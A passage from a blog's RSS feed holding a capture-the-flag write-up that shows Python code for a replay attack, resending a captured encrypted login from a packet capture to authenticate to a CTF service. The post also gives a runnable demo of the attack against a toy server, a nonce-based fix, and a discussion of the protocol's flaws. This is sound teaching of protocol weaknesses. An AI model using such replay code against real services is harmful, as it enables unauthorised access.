&lt;span class=&quot;n&quot;&gt;their&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;recv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;their_key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;RSA&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;importKey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;their&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'somepem.pem'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'r'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;our_key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;RSA&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;importKey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;our_public&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;our_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;publickey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;().&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;exportKey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;send&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;our_public&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;enc&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cip&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;new&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;their_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encrypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;dec&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cip&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;new&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;our_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;decrypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt; &lt;span class=&quot;bp&quot;&gt;True&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;cmd&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&amp;gt; &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;send&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;enc&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dec&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;recv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;256&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;Yes, I know that’s not how you should send and receive with python’s sockets. Yes, I’m using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;s&lt;/code&gt; globally. Yes, some of the naming is poor. Under CTF conditions, this is as good as you’re going to get ;P.&lt;/p&gt;

&lt;p&gt;So, we execute our client, run the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;getflag&lt;/code&gt; command, and we’re done right? Right?&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ python client.py
&amp;gt; getflag
Insufficient permissions! Please authenticate and try again.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Damn, we don’t have any credentials for this service. We can’t see the credentials that were used in the PCAP because we don’t have the RSA private key corresponding to the service’s public key (which the client uses to encrypt traffic in that direction). So what are we to do?&lt;/p&gt;

&lt;h2 id=&quot;could-you-repeat-that-please&quot;&gt;Could you repeat that please?&lt;/h2&gt;
&lt;p&gt;At this point, I lost &lt;em&gt;a lot&lt;/em&gt; of time in the CTF trying various methods of authenticating with the service; I extended my python script to brute-force credentials using the rockyou wordlist (this was slow, and bore no fruit), I tried using the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;adduser&lt;/code&gt; command with parameters of varying sizes in case there was an overflow onto some hypothetical &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;is_authenticated&lt;/code&gt; variable on the stack, I tried to search online for the fingerprint of the service’s RSA public key in case it had been chosen from the set of weak RSA keys from back when Debian’s PRNG for key generation was broken. No dice.&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;“Have you considered a replay attack?”&lt;/p&gt;

  &lt;p&gt;🤦&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Of course, the answer was to take the message which the client sent to the service immediately before it responded with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Authentication successful.&lt;/code&gt; (the encrypted login, which we can lift straight from the PCAP without being able to decrypt it) and send it to the service &lt;em&gt;before&lt;/em&gt; dropping into our interactive session. The service decrypts each message on its own and ties a login to nothing specific to the connection it arrived on, so the old ciphertext authenticates us just as well as the original credentials would, and we can then request the flag.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-python&quot; data-lang=&quot;python&quot;&gt;&lt;span class=&quot;kn&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;Crypto.Cipher&lt;/span&gt; &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;PKCS1_OAEP&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cip&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;Crypto.PublicKey&lt;/span&gt; &lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;RSA&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;socket&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;base64&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;AF_INET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;SOCK_STREAM&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;connect&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;ctf-ch7.cyberthreat2018.com&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;31337&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;their&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;recv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;their_key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;RSA&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;importKey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;their&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'somepem.pem'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'r'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;our_key&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;RSA&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;importKey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;read&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;our_public&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;our_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;publickey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;().&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;exportKey&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;send&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;our_public&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;enc&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cip&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;new&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;their_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encrypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;dec&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cip&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;new&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;our_key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cipher&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;decrypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;crypt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;plain&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;login_replay&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;&quot;&quot;dWVSS7A86P0D8b0Ce85Z8Bg6phb3uEWIVJCyoGtp3KjQqbDfxTGweVz+aseNwF9J38msGRZt8Ox6
                  Beyb6d70jByoLNoyVyx7Ws4/lxx2TyauSs/iUcaVF9YvWW87K9QGbInQTjrMBgi2Z5WhL/HNF5Am
                  7LIdBblz79r3t6pwI9A889t3ctZuacjcKLAn/m+0DGlnIMgQpgMLFQea7yhwyX7g65UfF1VPw/cG
                  UmuXIS0QHCpTOz1ve2WbgrBBYdn8tqMiDZySzU9IyAJF0vIVuC03Cc/gsQ+vo+84f0qOWYTmz2Z3
                  AQlbmZiewh70MaIteT3cPhKKKHMkt0AyB2Ws8A==&quot;&quot;&quot;&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;send&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;base64&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;b64decode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;login_replay&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dec&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;recv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;256&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;while&lt;/span&gt; &lt;span class=&quot;bp&quot;&gt;True&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;cmd&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;raw_input&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&amp;gt; &quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;send&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;enc&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;cmd&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;dec&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;recv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;256&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;Et voilà&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ python client.py
Authentication successful.
&amp;gt; getflag
AllYourDataAreBelongToUs
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;(Note: that wasn’t actually what the flag was - I can’t remember what it was, and the service is only accessible from within the CTF network - you can safely assume it was an equivalently nerdy quote :P)&lt;/p&gt;
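&lt;p&gt;To make the failure concrete, here is an added example (my own code, not the CTF service's, whose source we never saw) that models the protocol in plain Python: a server that RSA-decrypts each message on its own and replies to whichever public key the peer sent at connect time, a victim who logs in, and an attacker who holds only their own key pair plus the victim's captured login ciphertext. The RSA is a textbook stand-in with a random padding prefix rather than OAEP, so that re-encrypting the same plaintext still produces a different ciphertext; it is not secure and exists only so the example runs without third-party libraries. The credentials, the flag string and the nonce format are constructed. The same block shows the fix: the server hands each connection a fresh nonce that the login must echo, so a ciphertext lifted from another connection no longer authenticates.&lt;/p&gt;

```python
"""Replay attack on a per-message RSA protocol, plus the per-connection nonce fix.
Added example, not the CTF service's code. The RSA is a textbook stand-in with a
random padding prefix (NOT OAEP, not secure); creds, flag and nonce are constructed."""
import secrets

FLAG = "flag{constructed-for-this-example}"
DENIED = "Insufficient permissions! Please authenticate and try again."

def _is_probable_prime(n, rounds=16):
    """Miller-Rabin, adequate for generating demo keys."""
    if n in (0, 1):
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits):
    cand = 0
    while not _is_probable_prime(cand):
        cand = secrets.randbits(bits) | pow(2, bits - 1) | 1  # force top and low bits
    return cand

def generate_keypair(bits=1024):
    """Returns ((e, n), (d, n)). e is prime, so gcd(e, phi) == 1 iff e does not divide phi."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:
            return (e, p * q), (pow(e, -1, phi), p * q)

def rsa_encrypt(pub, msg):
    """Block = [len][16 random bytes][msg]; like OAEP, the same plaintext encrypts differently each time."""
    e, n = pub
    size = (n.bit_length() + 7) // 8
    if len(msg) not in range(1, size - 17):
        raise ValueError("message does not fit in one block")
    block = bytes([len(msg)]) + secrets.token_bytes(16) + msg
    return pow(int.from_bytes(block, "big"), e, n).to_bytes(size, "big")

def rsa_decrypt(priv, ct):
    d, n = priv
    size = (n.bit_length() + 7) // 8
    block = pow(int.from_bytes(ct, "big"), d, n).to_bytes(size, "big").lstrip(b"\x00")
    if not block or len(block) != 17 + block[0]:
        raise ValueError("bad padding")
    return block[17:]

class Server:
    """Models the CTF service: each message decrypted on its own, replies encrypted to the
    peer's connect-time public key. With use_nonce=True a login must echo a fresh challenge."""
    def __init__(self, priv, creds, use_nonce=False):
        self.priv, self.creds, self.use_nonce = priv, creds, use_nonce
    def new_session(self, peer_pub):
        nonce = secrets.token_hex(8) if self.use_nonce else None  # sent to the client in the clear
        return {"peer": peer_pub, "authed": False, "nonce": nonce}
    def handle(self, session, ct):
        parts = rsa_decrypt(self.priv, ct).decode().split()
        if parts[0] == "login":
            fields = 4 if self.use_nonce else 3
            ok = (len(parts) == fields and self.creds.get(parts[1]) == parts[2]
                  and (not self.use_nonce or parts[3] == session["nonce"]))
            session["authed"] = session["authed"] or ok
            reply = "Authentication successful." if ok else "Authentication failed."
        elif parts[0] == "getflag":
            reply = FLAG if session["authed"] else DENIED
        else:
            reply = "Unknown command."
        return rsa_encrypt(session["peer"], reply.encode())

def run_replay(use_nonce):
    """Victim logs in; an attacker with its own key pair but no credentials replays the
    captured login ciphertext on a fresh connection, then asks for the flag."""
    srv_pub, srv_priv = generate_keypair()
    vic_pub, vic_priv = generate_keypair()
    att_pub, att_priv = generate_keypair()
    server = Server(srv_priv, {"admin": "hunter2"}, use_nonce)  # constructed credentials
    victim = server.new_session(vic_pub)
    login = "login admin hunter2" + (" " + victim["nonce"] if use_nonce else "")
    captured = rsa_encrypt(srv_pub, login.encode())  # the blob a PCAP would hold
    assert rsa_decrypt(vic_priv, server.handle(victim, captured)) == b"Authentication successful."
    attacker = server.new_session(att_pub)
    auth = rsa_decrypt(att_priv, server.handle(attacker, captured)).decode()
    flag = rsa_decrypt(att_priv, server.handle(attacker, rsa_encrypt(srv_pub, b"getflag"))).decode()
    return auth, flag  # no nonce: ("Authentication successful.", FLAG); nonce: ("Authentication failed.", DENIED)

if __name__ == "__main__":
    print(run_replay(False), run_replay(True))
```

&lt;p&gt;Running it prints two tuples: without session binding the replayed login yields &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Authentication successful.&lt;/code&gt; and the flag; with the nonce it yields &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Authentication failed.&lt;/code&gt; and the insufficient-permissions message. The nonce only has to be unpredictable and unique per connection, not secret: an attacker who sees it still cannot produce a fresh encrypted login without the credentials. It does nothing against the man-in-the-middle problem, which comes from the unauthenticated key exchange and needs a separate fix.&lt;/p&gt;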

&lt;h2 id=&quot;closing-remarks&quot;&gt;Closing remarks&lt;/h2&gt;
&lt;p&gt;This is a good example of why you never write your own security protocol if you can help it. This one was vulnerable to replay attacks (nothing bound the login message to the connection it was sent on), is susceptible to man-in-the-middle attacks (the public keys are exchanged without any authentication, so you could sit in the middle and proxy requests, presenting your own public key to the client and to the service), and provides no forward secrecy, since every message is encrypted directly to a long-term RSA key; that is exactly why holding one private key let us decrypt the traffic in the PCAP in the first place…&lt;/p&gt;

&lt;p&gt;A massive thank you goes to the team at &lt;a href=&quot;https://twitter.com/HelicalLevity&quot;&gt;Helical Levity&lt;/a&gt; for putting together the pre-conference challenges and this CTF, as well as to &lt;a href=&quot;https://twitter.com/jameslyne&quot;&gt;James Lyne&lt;/a&gt; and the folks at &lt;a href=&quot;https://twitter.com/SANSEMEA&quot;&gt;SANS EMEA&lt;/a&gt; and the &lt;a href=&quot;https://twitter.com/ncsc&quot;&gt;National Cyber Security Centre&lt;/a&gt;.&lt;/p&gt;
</description>
        <pubDate>Thu, 01 Mar 2018 00:00:00 +0000</pubDate>
        <link>/post/cyberthreat18-ctf-na/</link>
        <guid isPermaLink="true">/post/cyberthreat18-ctf-na/</guid>
        
        
      </item>
    
      <item>
        <title>Solving the SANS Holiday Hack Challenge 2017</title>
        <description>&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Every year, the folks at &lt;a href=&quot;https://www.counterhackchallenges.com/&quot;&gt;Counter Hack Challenges&lt;/a&gt; and &lt;a href=&quot;https://www.sans.org/&quot;&gt;SANS&lt;/a&gt; run a cyber security challenge for people to enjoy over the festive season, and once again it was great fun and very educational.&lt;/p&gt;

&lt;p&gt;Head over to &lt;a href=&quot;https://holidayhackchallenge.com/2017/&quot;&gt;the challenge site&lt;/a&gt; to set the scene, have a look at the questions, and have a go for yourself before reading my solution below!&lt;/p&gt;

